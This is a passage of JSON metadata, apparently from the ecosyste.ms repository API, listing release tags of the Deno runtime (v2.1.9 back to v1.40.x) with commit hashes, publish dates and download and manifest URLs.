itHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49